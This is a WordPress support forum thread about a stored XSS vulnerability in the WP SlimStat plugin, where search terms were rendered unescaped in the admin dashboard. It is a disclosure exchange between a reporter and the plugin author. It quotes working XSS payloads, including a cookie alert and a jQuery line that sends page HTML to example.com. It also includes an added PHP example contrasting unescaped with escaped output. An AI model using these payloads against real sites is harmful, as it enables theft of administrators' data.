Support » Plugin: Slimstat Analytics » XSS Vulnerability ?!?!?

  • Resolved xssAlert

    (@xssalert)


    Hello, I found some problems with two plugins and WordPress,

    what I tried:
    ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//– >”>’>

    I put this in the comment field, plugin name “Bug Library v.1.2.6”
    and the status of plugin “wp-slimstat v2.8.3”
    I’m very sure that the last plugin runs this script. When I load the plugin in the admin backend and show where the visitors are coming from, the plugin runs this script and produces the alert window! Only this, but
    a really bad man can do more

    so please help to find it out
    thanks

    http://wordpress.org/extend/plugins/wp-slimstat/

Viewing 15 replies - 1 through 15 (of 22 total)
  • Plugin Author Jason Crouse

    (@coolmann)

    Could you please contact me at

    the mailbox

    to discuss this issue? I was not able to reproduce the issue just by using my plugin. Where did you type the javascript string?

    Thank you,
    Camu

    read top 🙂

    sorry for my English but I can send you a screenshot

    I already contacted you over your site.
    rob

    ah, put this code into search,
    so your wp-slimstat plugin just loads it and executes it. Where? On recent searches 🙂

    I am using the latest plugins

    Plugin Author Jason Crouse

    (@coolmann)

    I just tried to search for

    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'>

    in my local dev environment, but I couldn’t replicate the issue. The string is correctly encoded and so the javascript is not executed. Please elaborate 🙂

    Plugin Author Jason Crouse

    (@coolmann)

    I just sent you a private message to investigate the issue.

    Thank you for reporting it and for helping make WP SlimStat a better product.

    Camu

    <script>alert(document.cookie);</script>

    test it on search
    in your WP search,
    then log in and load the wp-slimstat overview; there you can see the last searches

    so enjoy

    Plugin Author Jason Crouse

    (@coolmann)

    I will release a fix as soon as possible, thank you. Please note though that no sensitive information can be transmitted to a different server, because of JavaScript’s security policies.

    Best
    Camu

    yup, but you can load “bad code” and load viruses etc.

    Plugin Author Jason Crouse

    (@coolmann)

    Okay, this should be fixed now. I will release a new version on Monday. In the meanwhile, would you be interested in testing this new version?

    cheers
    camu

    Please note though that no sensitive information can be transmitted to a different server, because of JavaScript’s security policies.

    That’s not correct. Data can be sent to any external server if you use a search-term like this:

    <script>jQuery('<img/>').attr('src','http://example.com/?data='+jQuery('body').html())</script>

    This would send the whole body HTML to example.com server. There are endless possibilities. This should be fixed ASAP.
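The defect discussed in this thread (the reporter's stored search term and Ov3rfly's exfiltration variant above) is output encoding: a stored search term is attacker-controlled data, and it must be escaped at the point where the admin page turns it into HTML. The following is an added illustration, not WP SlimStat's own code; the function names and the sample terms are constructed, and the `esc_html()` fallback only exists so the file runs outside WordPress.

```php
<?php
// Added example (not WP SlimStat's code): rendering stored search terms in an
// admin "recent searches" panel. Outside WordPress, esc_html() is not defined,
// so fall back to htmlspecialchars() to keep this file runnable stand-alone.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Vulnerable pattern: the stored term is concatenated straight into markup.
// Whatever the visitor typed into the search box reaches the admin's browser
// as HTML, and any <script> inside it runs with the admin's session.
function render_recent_searches_vulnerable(array $terms) {
    $html = '<ul>';
    foreach ($terms as $term) {
        $html .= '<li>' . $term . '</li>';
    }
    return $html . '</ul>';
}

// Hardened pattern: escape on output. The data is stored unchanged (it is
// legitimately a search term), but when it becomes HTML every < > " ' & is
// encoded, so the browser displays the term as text instead of parsing it.
function render_recent_searches_safe(array $terms) {
    $html = '<ul>';
    foreach ($terms as $term) {
        $html .= '<li>' . esc_html($term) . '</li>';
    }
    return $html . '</ul>';
}

// Constructed sample terms: one ordinary search and one of the kind reported
// in this thread (hypothetical stored values, not taken from a real log).
$stored_terms = [
    'wordpress themes',
    '<script>alert(document.cookie);</script>',
];

// The vulnerable rendering emits the script tag verbatim; the safe rendering
// emits it entity-encoded, so it is shown, not executed.
echo render_recent_searches_vulnerable($stored_terms), PHP_EOL;
echo render_recent_searches_safe($stored_terms), PHP_EOL;
```

In a WordPress plugin the same rule applies to every other sink on the admin page (attributes via `esc_attr()`, URLs via `esc_url()`), since a term that is harmless inside a list item can still break out of an attribute.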

    Plugin Author Jason Crouse

    (@coolmann)

    Thanks, Ov3rfly, you make a very good point indeed. This has already been fixed in version 2.8.5, which will be released asap. Are you interested in testing it to make sure the vulnerability has been addressed?

    sure..

    just send it to me over mail 🙂 but no virus XD :))

    WordPress should be fixed, to enable JavaScript in the search box, but no one is interested in it; next, change to another CMS

    Plugin Author Jason Crouse

    (@coolmann)

    I’ll send it to you as soon as possible, thank you for your help!

    Camu

    Plugin Author Jason Crouse

    (@coolmann)

    Sent it.

    you sent me that script already 2x
    and it seems not fixed. Maybe you ask in some forums about disabling rendering or whatever

    I can’t help you
    your script is now deleted
